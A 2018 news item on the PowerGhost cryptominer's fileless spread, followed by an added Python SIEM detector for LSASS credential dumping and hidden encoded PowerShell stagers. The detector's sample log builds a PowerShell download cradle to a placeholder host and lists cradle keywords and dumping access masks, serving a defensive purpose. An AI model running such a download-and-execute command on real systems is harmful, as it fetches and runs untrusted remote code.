Delaware, USA – August 2, 2018 – Researchers from Kaspersky Lab have discovered a new cryptocurrency miner, PowerGhost, which attacks the networks of organizations worldwide. The attackers use several fileless infection techniques to evade detection by antivirus solutions. The initial system is infected remotely, either through remote administration tools or by using exploits. Researchers from SonicWall Capture Labs, who also analyzed this malware, assume that users could be lured to an infected webpage that executes an obfuscated PowerShell script to download and run a second-stage script. The task of this script is to disable Windows Defender, collect information about the system, and execute the necessary modules without saving them to the hard drive. To mine cryptocurrency, the attackers use the infamous XMRig or BitMiner. PowerGhost then uses the Mimikatz tool to dump credentials on the infected system and uses them to propagate across the corporate network. The malware also uses the EternalBlue exploit for lateral movement. It is also worth noting that the malware has several additional features: it can load and run additional payloads and conduct DDoS attacks.
The campaign started in the second half of July and continues to this day. As in the case of WannaMine, PowerGhost can completely paralyze the operations of an entire company while remaining undetected by security solutions. Installing Windows security updates on vulnerable systems is necessary to protect against the malware spreading via the EternalBlue exploit. Detecting credential dumping is much harder, so you can use the Mimikatz Defence Framework for your SIEM to spot the beginning of the attack and act in time.
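The two signals the article singles out, a fileless PowerShell stager and Mimikatz-style credential dumping, are also the ones a SIEM rule can catch early. The following is an added example written for this page; it is not code from Kaspersky Lab, SonicWall, or the Mimikatz Defence Framework. It scans constructed Sysmon-like records (Event ID 10 ProcessAccess against lsass.exe, Event ID 1 ProcessCreate for powershell.exe) in a simplified key=value form. The set of suspicious LSASS access masks and the allow-list of trusted LSASS clients are assumptions to be tuned per environment, and every log line is constructed for illustration.

```python
"""
Added example (not from the original write-up): a minimal SIEM-style detector
for two PowerGhost-style behaviours described in the article:
  1. a process reading LSASS memory the way credential-dumping tools do
     (Sysmon Event ID 10, GrantedAccess mask), and
  2. a hidden, base64-encoded PowerShell launch typical of fileless stagers
     (Sysmon Event ID 1, CommandLine).
Input is a simplified key=value rendering of Sysmon fields, not real telemetry.
"""
import base64
import re

# Access masks commonly associated with tools that read LSASS memory.
# ASSUMPTION: starting point only; tune against your own baseline.
SUSPICIOUS_LSASS_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}

# Hypothetical allow-list of binaries legitimately expected to open LSASS
# (e.g. an endpoint security agent). Populate from your environment.
TRUSTED_LSASS_CLIENTS = {r"c:\program files\example-av\agent.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand / -WindowStyle.
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
CRADLE_KEYWORDS = ("downloadstring", "downloadfile", "iex", "invoke-expression")

# Constructed stager text, encoded exactly as PowerShell -EncodedCommand expects
# (UTF-16LE, then base64). Used only to build a realistic sample log line.
STAGER_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.invalid/s.ps1')"
ENCODED_STAGER = base64.b64encode(STAGER_TEXT.encode("utf-16le")).decode("ascii")

# Constructed sample records (not real events).
SAMPLE_LOGS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\x.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    'CommandLine="powershell.exe -NoP -W Hidden -Enc ' + ENCODED_STAGER + '"',
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    'CommandLine="powershell.exe -File C:\\scripts\\backup.ps1"',
]

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_record(line):
    """Parse key=value pairs; a value may be double-quoted to contain spaces."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


def check_lsass_access(rec):
    """Flag LSASS reads with a dumping-style mask from a non-allow-listed source."""
    if rec.get("EventID") != "10":
        return None
    if not rec.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    mask = int(rec.get("GrantedAccess", "0"), 16)
    src = rec.get("SourceImage", "").lower()
    if mask in SUSPICIOUS_LSASS_MASKS and src not in TRUSTED_LSASS_CLIENTS:
        return f"lsass_access source={src} mask={mask:#x}"
    return None


def decode_encoded_command(b64):
    """Reverse PowerShell's -EncodedCommand encoding; None if it is not valid."""
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell_launch(rec):
    """Return a list of stager-like signals for a powershell.exe launch, or None."""
    if rec.get("EventID") != "1":
        return None
    if not rec.get("Image", "").lower().endswith("\\powershell.exe"):
        return None
    cmd = rec.get("CommandLine", "")
    signals = []
    if HIDDEN_FLAG_RE.search(cmd):
        signals.append("hidden_window")
    m = ENCODED_FLAG_RE.search(cmd)
    if m:
        signals.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        # Decoding lets the analyst see the stager text instead of opaque base64.
        if decoded and any(k in decoded.lower() for k in CRADLE_KEYWORDS):
            signals.append("download_cradle")
    return signals or None


def scan(lines):
    """Run both checks over every record and collect alert strings."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        hit = check_lsass_access(rec)
        if hit:
            alerts.append(hit)
        sig = check_powershell_launch(rec)
        if sig:
            alerts.append("powershell_launch " + ",".join(sig))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(alert)
```

Run as written, the scan raises two alerts: the LSASS read from the Temp-directory binary with mask 0x1010, and the hidden, encoded PowerShell launch whose decoded payload contains a download cradle. The svchost.exe access (mask 0x1000) and the plain `-File` launch pass, which is the point of keying on the access mask and the launch flags rather than on process names alone; in production the allow-list and mask set are where most tuning happens.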